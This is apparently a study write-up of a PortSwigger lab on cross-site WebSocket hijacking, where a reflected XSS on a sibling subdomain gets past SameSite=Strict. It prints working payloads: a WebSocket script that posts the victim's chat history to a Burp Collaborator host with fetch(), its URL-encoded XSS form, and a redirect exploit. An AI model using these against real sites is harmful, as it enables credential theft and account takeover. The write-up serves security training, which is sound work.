[This lab](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain) shows how **WebSocket connections** are not protected by `SameSite` restrictions and how you can **leverage a same-site reflected XSS** on a sibling subdomain (e.g., `cms-...`) to launch a **WebSocket hijack** from a browser that **will include the session cookie**. The attack ultimately leaks the victim's chat history — which includes their credentials — to Burp Collaborator.
##### Step 1: Confirm WebSocket Behavior
1. In Burp’s browser, go to **Live Chat**
2. Send a few messages
3. In **Burp → WebSockets**, locate:
```
GET /chat HTTP/1.1
Upgrade: websocket
```
✅ Observe:
- No CSRF tokens
- A `"READY"` message triggers the full chat history to be returned
---
##### Step 2: Confirm CSWSH via SameSite=Strict
1. Create PoC script on **Exploit Server**:
```html
<script>
var ws = new WebSocket("wss://YOUR-LAB-ID.web-security-academy.net/chat");
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(e) {
fetch("https://YOUR-COLLABORATOR-PAYLOAD.oastify.com", {
method: "POST", mode: "no-cors", body: e.data
});
};
</script>
```
2. Store + View Exploit
3. In **Burp → Collaborator**, click **Poll now**
✅ You get **HTTP interaction**
❌ But this is from your exploit’s session → **victim session cookie is not included** due to `SameSite=Strict`
---
##### Step 3: Discover Sibling Domain and Reflected XSS
1. In Burp Proxy, note that resources like `/resources/js/xyz.js` include:
```
Access-Control-Allow-Origin: cms-YOUR-LAB-ID.web-security-academy.net
```
![[CleanShot 2025-04-23 at 20.38.35.png]]
2. Visit:
```
https://cms-YOUR-LAB-ID.web-security-academy.net
```
✅ A login form is present
![[CleanShot 2025-04-23 at 20.39.49.png]]
3. Submit:
```
username: <script>alert(1)</script>
password: anything
```
✅ XSS triggered in response → **reflected XSS on sibling domain**
4. Send XSS request to **Burp Repeater**
- Change method to `GET`
- Copy and test the URL in browser → XSS still triggers ✅
It will be like:
```js
/login?username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=xxx
```
---
#### Step 4: Inject CSWSH via Reflected XSS
1. URL-encode the full CSWSH payload:
```javascript
<script>
var ws = new WebSocket("wss://YOUR-LAB-ID.web-security-academy.net/chat");
ws.onopen = function() { ws.send("READY"); };
ws.onmessage = function(e) {
fetch("https://YOUR-COLLABORATOR-PAYLOAD.oastify.com", {
method: "POST", mode: "no-cors", body: e.data
});
};
</script>
```
➡ Encoded payload (example, partial):
```
%3Cscript%3Evar%20ws%20%3D%20new%20WebSocket%28%22wss%3A%2F%2FYOUR-LAB-ID.web-security-academy.net%2Fchat%22%29%3B...
```
2. Create exploit on Exploit Server:
```html
<script>
location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=PASTE-ENCODED-CSWSH-HERE&password=anything";
</script>
```
3. **Store and View Exploit**
✅ This causes:
- Victim loads your exploit (external site)
- Their browser navigates to **same-site sibling subdomain**
- XSS fires, runs **WebSocket hijack**
- Session cookie **is included** → `SameSite=Strict` **bypass achieved**
---
##### Step 5: Exfiltrate and Extract Victim Credentials
1. In **Burp → Collaborator**, click **Poll now**
✅ You see new **HTTP interactions**
2. Inside the body of these requests, find:
![[CleanShot 2025-04-23 at 20.50.00.png]]
---
##### Step 6: Log In and Solve the Lab
1. Go to the main lab domain
2. Log in
✅ Lab Solved
---
##### Summary
|Exploit Chain|Description|
|---|---|
|Target vulnerability|CSWSH (WebSocket hijack)|
|Defense bypassed|`SameSite=Strict` cookies|
|Bypass method|Reflected XSS on sibling domain (same-site)|
|Key vector|WebSocket opened after redirect with included cookie|
|Exfil method|`fetch()` to Burp Collaborator|